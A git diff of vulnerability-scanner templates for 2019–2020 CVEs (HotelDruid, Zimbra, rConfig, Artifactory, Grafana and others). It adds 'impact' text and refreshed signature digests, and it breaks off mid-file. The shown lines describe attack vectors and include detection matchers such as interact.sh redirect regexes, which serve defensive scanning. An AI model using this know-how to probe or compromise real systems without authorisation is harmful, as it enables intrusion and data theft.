\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml
index e424ff980b..367d39182b 100644
--- a/http/cves/2019/CVE-2019-8937.yaml
+++ b/http/cves/2019/CVE-2019-8937.yaml
@@ -5,6 +5,8 @@ info:
   author: LogicalHunter
   severity: medium
   description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201f3b6d01163092847c99a1c1c0560474cff050008b8a1faac4003362bcf493eb022100d2404d7c4b8fb437b2cea0aa3b46e6591e5e3c7e906beddd6880233575c6a28e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022052f155fe3e612c8c031a1a12c4a66284cf20e8fd35a7e02a4624b5c8efab92310220173393e0e315457f4cd371d353d9985e752b2269573a8bfb8175da3274d4fb08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml
index 4b14438a91..7b3f257754 100644
--- a/http/cves/2019/CVE-2019-8982.yaml
+++ b/http/cves/2019/CVE-2019-8982.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
+  impact: |
+    Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks.
   remediation: |
     Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009f1d7ea522aa42540ee8bbb81b3991bffc4b4987ec0ca619d5067d495ca59a8f0221008cc0fb3a1484035bb1705e27cccd6b21ebe17d03c7858a740870586eff8053e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f3e1bf6b9045b63e90e9232d084680c3e5affe8ec19289b8a1e625605cf36830221009c83ca8eb13c8a8323a9b2364d7144c2df7cf38f24dab2bac488450d9f6a8c08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index b7d3291333..37fde5feab 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of ZZZCMS.
   reference:
@@ -16,7 +18,7 @@ info:
     cvss-score: 7.2
     cve-id: CVE-2019-9041
     cwe-id: CWE-917
-    epss-score: 0.01396
+    epss-score: 0.01127
     epss-percentile: 0.84894
     cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
   metadata:
@@ -45,4 +47,4 @@ http:
           - '!contains(body_1, "phpinfo")'
           - 'contains_all(body_2, "phpinfo","PHP Version")'
         condition: and
-# digest: 4a0a00473045022100f25d0dc5037782a32a7f149f09046cee694866c1685207793f728b037da8b339022024be98caff06bb3dfadebd3b2d09889b7f2e2ecf7a59730946b8a85d9a8b1dee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b0b77ddb251bca47f3c013bd855ff35756417bfbc3fb3c8aa2d64e186872f1df022100a2eb4670632e731ccec39fe2d914298401ebd872d23ecae47bc2acd50d3c4877:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml
index 8c0d9fb1a7..8cb09c6b95 100644
--- a/http/cves/2019/CVE-2019-9670.yaml
+++ b/http/cves/2019/CVE-2019-9670.yaml
@@ -5,6 +5,8 @@ info:
   author: ree4pwn
   severity: critical
   description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information.
   remediation: |
     Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 503
-# digest: 4a0a004730450220158e3f53d194f41fa5d017b71afb0e4842d1b659ebc6322b1cc9b03fc236bf58022100c2e16783a7882eb2ab1113b8a01b127fdc574574ab1d4ec088ce2de974af9db0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100887e00b42b4a41ce5fa2cd81368eb62445344497405e71680ae3bfab44593a4c022063240ccc6398667f5623490dc753dedbeb9741bec482d02b518fc20f8ab45882:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml
index 914509bb1b..a338f72c45 100644
--- a/http/cves/2019/CVE-2019-9726.yaml
+++ b/http/cves/2019/CVE-2019-9726.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220791dd15b94a5d8a6ca3bf9aa5f23d29505a58892d7a8d879fcc54687ade21ca8022100fc847515824e1f63df7d0473d1d80bda42a1f4858f567c01c2485b6322234c2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210083b2f107e9b5fefa587c88d086efb710b528070849d8e79bb8aa8995a4e4e42f022100b12e13c4c1c167df0b33472725c90d5069ed6c5e788c146c3d91d966fa0f5a87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml
index e59ba826e4..e19202b6ed 100644
--- a/http/cves/2019/CVE-2019-9733.yaml
+++ b/http/cves/2019/CVE-2019-9733.yaml
@@ -5,6 +5,8 @@ info:
   author: akshansh
   severity: critical
   description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
+  impact: |
+    Successful exploitation allows unauthorized access to the admin panel.
   remediation: |
     Upgrade to a patched version of JFrog Artifactory or apply the necessary security patches.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009e1a60e5f872fc61ddffeb457f3251dfd3592102d56304a20407368b09bd53b10221009368c086dff061462930a216081cebdf91613fd86e091d03f7c8940a0975d0aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205623a00b4bacd085775f2ab82ed05029c2672f369ec29d86e8590d42ed9a5417022002e8932d6fe8d771d120b75aaf2ecd188462ce23442b07cc62b72236d886630a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml
index e92d68424c..b8178280f3 100644
--- a/http/cves/2019/CVE-2019-9915.yaml
+++ b/http/cves/2019/CVE-2019-9915.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
-# digest: 4a0a00473045022100ae52082b7d27ae0c662f8fe6453c9fa9921b2ca39c594b41f6f318c98ab9d13c0220033de38e8fbf48b971901d399c82dc53cae3a35e382944ac0e138187ee683a76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c363b059d8b13ff0fcca43e7c827aa4f21f63002a0f23e481e69ded199001782022100bf1594769f31e90c65c38f83901d6ac3d94f70f08fff5358e1e2b280781819b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml
index c19738fd14..d1ea575d6e 100644
--- a/http/cves/2019/CVE-2019-9922.yaml
+++ b/http/cves/2019/CVE-2019-9922.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application.
   remediation: |
     Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bed5195c17f7e34ebb174b40956b8f92d9e5fa6a93e24991068d119da39f491f022100b5b62588e709fce1454a54a356ef1cb0e444bba02f0364b3f2bf9f03dc89c1ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100eabd17500c2ab75ba0d6517ea9f619f3ebbabee3401ca8cf74eac18cd1564be6022100c7800addb7231724b3a5819ae04cc120fb6756b674af64964e5dcef48acc0956:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml
index 81960cba7d..6b129cce97 100644
--- a/http/cves/2019/CVE-2019-9978.yaml
+++ b/http/cves/2019/CVE-2019-9978.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot,dwisiswant0
   severity: medium
   description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100f257ea61e79f63c8ecd4ecebf6cd31aa2aa9f52a0aee1b133d83e6feda67a36a022100b4eef3c5fd84793ab881a3b358b97c3ca7e1731252991181e36a16413b6de256:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100927eefe1d8bbc6eda221bc2d9e4cd680740749777f60ef06f0d5ca31cf9447c8022100e2a18b128fa3b47e2708ff8779d60751552c92cad03f756117a035b8d5228feb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml
index df367be2c2..98f40f0ed5 100644
--- a/http/cves/2020/CVE-2020-0618.yaml
+++ b/http/cves/2020/CVE-2020-0618.yaml
@@ -5,6 +5,8 @@ info:
   author: joeldeleep
   severity: high
   description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206e27268bb95ff93129ca2ecedec49d591747f45a25fb9cd7aa54791ff4ecb93b02201f085b17ed4fcb455ee2c8a1b8ba3c628fb5dbad756c4cd46e5ce03a906d448d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fb08831b829d85dd83480a0c12c8d863ca4e21774ee86095fe17465a44647e2a022100c2cb034a985bc849dedbcdf34f6e761bd8ba756ed67cdee09ec895138af1426e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml
index cf80e04df0..271fb23d30 100644
--- a/http/cves/2020/CVE-2020-10148.yaml
+++ b/http/cves/2020/CVE-2020-10148.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the SolarWinds Orion system.
   remediation: |
     Apply the necessary patches or updates provided by SolarWinds to fix the authentication bypass vulnerability.
   reference:
@@ -55,5 +57,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100dcf4502429d00a459addea5fe09cc36dbb98415cf0cc9f90ed4a5c4228d5070902205f7019c883fb1903e33cdf9df4b8898f8637f8c3387af003c324d4422be99276:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210085be8ac3c5e5e0bd1cae0dc90f135e6ccc80d46b365c426e111062683dab7873022100a3495bc801f03d0adf07be7edc4836bfebebe89c27763f7497d3cebc19ca7472:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml
index 1b4258f9c0..dd7047555f 100644
--- a/http/cves/2020/CVE-2020-10199.yaml
+++ b/http/cves/2020/CVE-2020-10199.yaml
@@ -5,6 +5,8 @@ info:
   author: rootxharsh,iamnoooob,pdresearch
   severity: high
   description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4a0a0047304502200cff518341a4710858d3b551a63a170887629c5f5e1ac4f31f0541ecf88586d7022100b229aa9717b0b562941f770a0921571fb1ed2cef1c7028bf4dbc2cb1498324e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204c38a6f4877fdbdea6675b1e886d3b7a72db80159eaa00b7f9ac103296df29ca022010124708ea204a671da4a2fba7445ed26fe1eb0244c3d46080b741e7a456010f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml
index b24ec606b6..58aa6fac33 100644
--- a/http/cves/2020/CVE-2020-10220.yaml
+++ b/http/cves/2020/CVE-2020-10220.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008dec01f4284ece07b4dc09d9eb599b9a75f222f773938c54305d3d8c6fc8726e022100fea5669022a76485c12a720a42aa42893db89b7da48211e57336ced754dafce0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a4d296922b82014af3e4ba6f2d0d01df3a0c22bab5476ac0065499060a3dad0e022100c1a2555f11874d4e1691c3c0de9c07e8dbd72e7854cc379081d740bb338090b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml
index 3d2f98a26a..c8307a8564 100644
--- a/http/cves/2020/CVE-2020-10546.yaml
+++ b/http/cves/2020/CVE-2020-10546.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022045bea7fd0ffd9d235ae281df1204531d327c120b1644b3dd33631b2fe1bee0570220356d2ff4f04ad1338aec89cc46a79a24dad8b41d7bf5f69a6684943c4d4ae3ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202934ef6ada93f6d157336e0e564cee87cb0848716d7d8e92cad66f5c6e86e145022000cf79652c3c27abb2521bb81efb671bbf2858a9c6e199065f017c820f2f618f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml
index 414feaa6d1..ac1d58ade1 100644
--- a/http/cves/2020/CVE-2020-10547.yaml
+++ b/http/cves/2020/CVE-2020-10547.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f00655b81378624b80d6b62783c9471d18b05d9970fca3da4cc5505d7daa9d06022100d4ae4d60034dc9a52ed22350e986b7113459b19133500831665b0f6846b2dfce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220156f178c2d0258c01da59583c7d9dea2353a81293cb1dae8906af2e4df99600e0220528993db3c56e779dc0c56ac38850d06b12bac2863bdb169a27c71e742a3ba02:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml
index 2ed249fa9e..25035bf4e0 100644
--- a/http/cves/2020/CVE-2020-10548.yaml
+++ b/http/cves/2020/CVE-2020-10548.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Upgrade to a patched version of rConfig or apply the necessary security patches provided by the vendor.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022071ce696a5aaa8834aff32f11c7fada8db9ac5ea120e55b13bc518ed0006a1e61022047c60e83549e751b749b9fc69f54dc081e96aeb85b9c3aa8278b9379e3a53868:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f9491f17cd1efacfe359678a3ddace7f760936481791674aa99eca24b5d0cbbd0221008164c6c732b340d44c07cffdf6b265dfb198d8aac9eb99bbba836d738f3ba0f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml
index c12899cb65..ecbfdaac96 100644
--- a/http/cves/2020/CVE-2020-10549.yaml
+++ b/http/cves/2020/CVE-2020-10549.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022002363b44ffb83725ccb68ae6c5d0b1bb593445d6a824adcc884ac8f7dd2d192502203844d872b4f38e86befbd210db16b6e8bba0685eb4e87145251a1d9e54be8f68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205c901d76b713ecdbd1a36666a31c3daefbd5a89e2712484dcfe3a5f26e80898202202adac9f4f11870a73fadcaee843abe698d4c79814e011942a6d458f8b73d904f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml
index 83f3c1cbf9..e72d83a571 100644
--- a/http/cves/2020/CVE-2020-10770.yaml
+++ b/http/cves/2020/CVE-2020-10770.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks.
   remediation: |
     Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a0047304502210095df0d0ae4c9d542cd5e4217e5286b82fc1ea9b0b8f5aab14c6a29bcc1b81cf4022018fe8a5e46727f349678415214c5157cd96a5f1a2e4a3b3325f7b955b8d3ac40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206df4b52dc8e0de1e77296a4ea8f9c0021e15e6c044494377f3a48f7db1d6dbd302206cf27470c3fe88c40db129cf548d9f6b849a2d37d380ed833370ed4e1ff6ea89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml
index 639361a7ba..c5b08d6ff6 100644
--- a/http/cves/2020/CVE-2020-10973.yaml
+++ b/http/cves/2020/CVE-2020-10973.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022070404e65e3b2f6ffb7daca05d5cb53ebce99d7c2d1865f9dc0a316d786718eaf02204a1a1b7dbfcee53bac575d013f32ef06e17c0ee7bdf5f87d01d913c01ec8d5ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081f69509eff5690966d1ed5424eeb35ca03abc77e5506baba85e0e8bc61a0204022100db5c5995aeb2854dbd2dbe27a10560b64dcbf56de2ed3faf0f0e7cb83d00ffb4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml
index 21dd02d8f3..ec3f0075b8 100644
--- a/http/cves/2020/CVE-2020-11034.yaml
+++ b/http/cves/2020/CVE-2020-11034.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: Upgrade to version 9.4.6 or later.
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
-# digest: 4a0a0047304502205fb6941a691d93294f5af3358c798b7babc61833088432fcd852d4e3a622f40c022100e155ddb4aad6e688abedced3cc2828a3cfd3191afcbe6ae902f80fadfef2e0c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200b712e211c81d683bdf9a27420415589ceb44f7f04e271acaedf19154a96e7e902206fadcca4e5c95e3318dd93645d968207e61a68bfee03e53bd967910079fc13f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml
index 2468ccf273..1d1709dbdc 100644
--- a/http/cves/2020/CVE-2020-11110.yaml
+++ b/http/cves/2020/CVE-2020-11110.yaml
@@ -5,6 +5,8 @@ info:
   author: emadshanab
   severity: medium
   description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: This issue can be resolved by updating Grafana to the latest version.
   reference:
     - https://github.com/grafana/grafana/pull/23254
@@ -64,4 +66,4 @@ http:
         regex:
           - '"url":"([a-z:/0-9A-Z]+)"'
         part: body
-# digest: 4b0a00483046022100da935f2e22c783bb5f15f1a75c300aceca995af9f8c12119e0d0400d0f29dc0e022100ff31b84cfb3d2608188031ec2e07015073e37d1427da736b8bc88ea38288fc98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205078f81fb2541595f3c3d89ffd0209bba366cf2cd303dc3c914157127eec5166022100bfcdfcd0408c37b8e8c5c965d5dcb074473032ce9eb778d7ec4047a0c61f7e2e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml
index eec07a6fb9..e0b027ed62 100644
--- a/http/cves/2020/CVE-2020-11450.yaml
+++ b/http/cves/2020/CVE-2020-11450.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information.
   remediation: Mitigated in all versions 11.0 and higher.
   reference:
     - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ec5553a762d6d46d5abb04557ac4788afe60666f7efdbff2bf95bb81f132bb3a0221008fbffb5bcaea5228ec810d3e5bd70781b52743c0a0c06f768227a93189afa892:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 480a00453043021f6ffa9df54849319aa178317081c7c5b0e8d601122c211aff04859fc2ad8e0302204ed9808232874bc0ff6d672d9b7bd199a17fca69127dfacd8275d06968c5ea05:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml
index a55d320873..30cd46d109 100644
--- a/http/cves/2020/CVE-2020-11455.yaml
+++ b/http/cves/2020/CVE-2020-11455.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
